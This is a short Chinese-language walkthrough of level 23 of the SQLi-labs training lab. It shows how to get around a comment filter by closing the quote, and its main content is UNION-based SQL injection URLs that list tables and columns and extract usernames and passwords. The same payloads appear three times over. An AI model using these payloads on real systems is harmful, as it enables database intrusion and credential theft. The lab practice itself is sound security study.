Sqlilabs-23

第 23 关对注入字符做了正则表达式的过滤，所以需要在引号上下功夫：
Sqlilabs-23

http://sqlilabs/Less-23/?id=1' and '1

知道了原理构造起来就很简单了：
–查表
`http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tables where table_schema=database()),3 and '1' = '1`

简化：
http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tables where table_schema=database()),'3

Sqlilabs-23

–查列
`http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(column_name) from informatIon_schema.columns where table_schema=database() and table_name='users'),'3`

Sqlilabs-23

–查数据
`http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(username) from users),'3`

Sqlilabs-23

`http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(password) from users),'3`

Sqlilabs-23

????

知道了原理构造起来就很简单了： –查表http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tables where table_schema=database()),3 and '1' = '1

–查列http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(column_name) from informatIon_schema.columns where table_schema=database() and table_name='users'),'3

–查数据http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(username) from users),'3

http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(password) from users),'3

知道了原理构造起来就很简单了：
–查表
`http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tables where table_schema=database()),3 and '1' = '1`

–查列
`http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(column_name) from informatIon_schema.columns where table_schema=database() and table_name='users'),'3`

–查数据
`http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(username) from users),'3`

`http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(password) from users),'3`